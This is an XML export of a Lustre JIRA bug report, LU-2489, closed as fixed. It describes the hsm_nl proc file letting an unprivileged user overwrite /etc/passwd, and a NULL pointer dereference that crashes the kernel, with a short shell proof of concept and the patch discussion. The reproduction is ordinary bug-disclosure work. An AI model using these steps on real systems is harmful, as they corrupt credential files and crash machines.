<!-- 
RSS generated by JIRA (9.4.14#940014-sha1:734e6822bbf0d45eff9af51f82432957f73aa32c) at Sat Feb 10 01:25:39 UTC 2024

It is possible to restrict the fields that are returned in this document by specifying the 'field' parameter in your request.
For example, to request only the issue key and summary append 'field=key&field=summary' to the URL of your request.
-->
<rss version="0.92" >
<channel>
    <title>Whamcloud Community JIRA</title>
    <link>https://jira.whamcloud.com</link>
    <description>This file is an XML representation of an issue</description>
    <language>en-us</language>    <build-info>
        <version>9.4.14</version>
        <build-number>940014</build-number>
        <build-date>05-12-2023</build-date>
    </build-info>


<item>
            <title>[LU-2489] hsm_nl DOSs</title>
                <link>https://jira.whamcloud.com/browse/LU-2489</link>
                <project id="10000" key="LU">Lustre</project>
                    <description>&lt;p&gt;Can /proc/fs/lustre/mdc/lustre-MDT0000-mdc-ffff88018f0a9000/hsm_nl be removed?  grep and google would suggest so.&lt;/p&gt;

&lt;p&gt;cfs_user_write() should call vfs_user_write() instead of invoking filp-&amp;gt;f_op.write() which does not check f_mode.&lt;/p&gt;
&lt;div class=&quot;preformatted panel&quot; style=&quot;border-width: 1px;&quot;&gt;&lt;div class=&quot;preformattedContent panelContent&quot;&gt;
&lt;pre&gt;# ./lutsre/tests/llmount.sh
...
# su sanity -
$ echo LULZ &amp;gt; /etc/passwd
bash: /etc/passwd: Permission denied
$ exec 3&amp;lt;/etc/passwd
$ echo 3 &amp;gt; /proc/fs/lustre/mdc/lustre-MDT0000-mdc-ffff88018f0a9000/hsm_nl
$ exec 3&amp;gt;&amp;amp;-
$ head /etc/passwd
���d&#65533;���lustre-MDT0000-mdcffff88�0008�
n/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
&lt;/pre&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The list heads in kkuc_groups (whatever those are) may be uninitialized.&lt;/p&gt;
&lt;div class=&quot;preformatted panel&quot; style=&quot;border-width: 1px;&quot;&gt;&lt;div class=&quot;preformattedContent panelContent&quot;&gt;
&lt;pre&gt;$ echo 0 &amp;gt; /proc/fs/lustre/mdc/lustre-MDT0000-mdc-ffff88018f0a9000/hsm_nl

BUG: unable to handle kernel NULL pointer dereference at 0000000000000018
IP: [&amp;lt;ffffffffa02eee68&amp;gt;] libcfs_kkuc_group_put+0x68/0x150 [libcfs]
PGD 188d1a067 PUD 191b12067 PMD 0 
Oops: 0000 [#1] SMP 
...
&lt;/pre&gt;
&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Greetz: taviso, cea, apop, all the droneZ back at Unimatrix 0.&lt;/p&gt;</description>
                <environment></environment>
        <key id="16926">LU-2489</key>
            <summary>hsm_nl DOSs</summary>
                <type id="1" iconUrl="https://jira.whamcloud.com/secure/viewavatar?size=xsmall&amp;avatarId=11303&amp;avatarType=issuetype">Bug</type>
                                            <priority id="4" iconUrl="https://jira.whamcloud.com/images/icons/priorities/minor.svg">Minor</priority>
                        <status id="6" iconUrl="https://jira.whamcloud.com/images/icons/statuses/closed.png" description="The issue is considered finished, the resolution is correct. Issues which are closed can be reopened.">Closed</status>
                    <statusCategory id="3" key="done" colorName="success"/>
                                    <resolution id="1">Fixed</resolution>
                                        <assignee username="keith">Keith Mannthey</assignee>
                                    <reporter username="jhammond">John Hammond</reporter>
                        <labels>
                            <label>patch</label>
                    </labels>
                <created>Thu, 13 Dec 2012 12:56:48 +0000</created>
                <updated>Tue, 15 Oct 2013 23:49:57 +0000</updated>
                            <resolved>Tue, 8 Jan 2013 10:07:33 +0000</resolved>
                                    <version>Lustre 2.4.0</version>
                    <version>Lustre 2.1.4</version>
                                    <fixVersion>Lustre 2.4.0</fixVersion>
                    <fixVersion>Lustre 2.5.0</fixVersion>
                                        <due></due>
                            <votes>0</votes>
                                    <watches>6</watches>
                                                                            <comments>
                            <comment id="49198" author="jhammond" created="Thu, 13 Dec 2012 13:26:54 +0000"  >&lt;p&gt;Please see &lt;a href=&quot;http://review.whamcloud.com/4824&quot; class=&quot;external-link&quot; target=&quot;_blank&quot; rel=&quot;nofollow noopener&quot;&gt;http://review.whamcloud.com/4824&lt;/a&gt; and &lt;a href=&quot;http://review.whamcloud.com/4825&quot; class=&quot;external-link&quot; target=&quot;_blank&quot; rel=&quot;nofollow noopener&quot;&gt;http://review.whamcloud.com/4825&lt;/a&gt;.&lt;/p&gt;</comment>
                            <comment id="49405" author="rhenwood" created="Tue, 18 Dec 2012 14:35:58 +0000"  >&lt;p&gt;John: any reason not to have these two entries as either a single patch or dependent patches?&lt;/p&gt;</comment>
                            <comment id="49406" author="jhammond" created="Tue, 18 Dec 2012 15:59:08 +0000"  >&lt;p&gt;There are no dependencies between the two.  There is also no reason that they cannot be merged.&lt;/p&gt;</comment>
                            <comment id="49970" author="keith" created="Fri, 4 Jan 2013 14:41:57 +0000"  >&lt;p&gt;I don&apos;t see any issue with having these as two separate changes. &lt;/p&gt;</comment>
                            <comment id="50128" author="pjones" created="Tue, 8 Jan 2013 10:07:33 +0000"  >&lt;p&gt;Landed for 2.4&lt;/p&gt;</comment>
                            <comment id="59952" author="bergwolf" created="Tue, 4 Jun 2013 11:12:29 +0000"  >&lt;p&gt;Hi, what happens to the bug? It seems the two landed patches didn&apos;t try to fix it.&lt;/p&gt;

&lt;div class=&quot;preformatted panel&quot; style=&quot;border-width: 1px;&quot;&gt;&lt;div class=&quot;preformattedContent panelContent&quot;&gt;
&lt;pre&gt;The list heads in kkuc_groups (whatever those are) may be uninitialized.
$ echo 0 &amp;gt; /proc/fs/lustre/mdc/lustre-MDT0000-mdc-ffff88018f0a9000/hsm_nl

BUG: unable to handle kernel NULL pointer dereference at 0000000000000018
IP: [&amp;lt;ffffffffa02eee68&amp;gt;] libcfs_kkuc_group_put+0x68/0x150 [libcfs]
PGD 188d1a067 PUD 191b12067 PMD 0 
Oops: 0000 [#1] SMP 
...
&lt;/pre&gt;
&lt;/div&gt;&lt;/div&gt;</comment>
                            <comment id="60704" author="jhammond" created="Fri, 14 Jun 2013 19:29:37 +0000"  >&lt;p&gt;Please see &lt;a href=&quot;http://review.whamcloud.com/6656&quot; class=&quot;external-link&quot; target=&quot;_blank&quot; rel=&quot;nofollow noopener&quot;&gt;http://review.whamcloud.com/6656&lt;/a&gt; for a patch to remove hsm_nl completely.&lt;/p&gt;</comment>
                            <comment id="61996" author="jhammond" created="Wed, 10 Jul 2013 02:47:53 +0000"  >&lt;p&gt;The patch to remove hsm_nl completely has landed to master.&lt;/p&gt;</comment>
                    </comments>
                    <attachments>
                    </attachments>
                <subtasks>
                    </subtasks>
                <customfields>
                                                                                                                                                                                            <customfield id="customfield_10890" key="com.atlassian.jira.plugins.jira-development-integration-plugin:devsummary">
                        <customfieldname>Development</customfieldname>
                        <customfieldvalues>
                            
                        </customfieldvalues>
                    </customfield>
                                                                                                                                                                                                                                                                                                                                                        <customfield id="customfield_10390" key="com.pyxis.greenhopper.jira:gh-lexo-rank">
                        <customfieldname>Rank</customfieldname>
                        <customfieldvalues>
                            <customfieldvalue>1|hzvdsv:</customfieldvalue>

                        </customfieldvalues>
                    </customfield>
                                                                <customfield id="customfield_10090" key="com.pyxis.greenhopper.jira:gh-global-rank">
                        <customfieldname>Rank (Obsolete)</customfieldname>
                        <customfieldvalues>
                            <customfieldvalue>5843</customfieldvalue>
                        </customfieldvalues>
                    </customfield>
                                                                                            <customfield id="customfield_10060" key="com.atlassian.jira.plugin.system.customfieldtypes:select">
                        <customfieldname>Severity</customfieldname>
                        <customfieldvalues>
                                <customfieldvalue key="10022"><![CDATA[3]]></customfieldvalue>

                        </customfieldvalues>
                    </customfield>
                                                                                                                                                                                                                                                                                                                                                        </customfields>
    </item>
</channel>
</rss>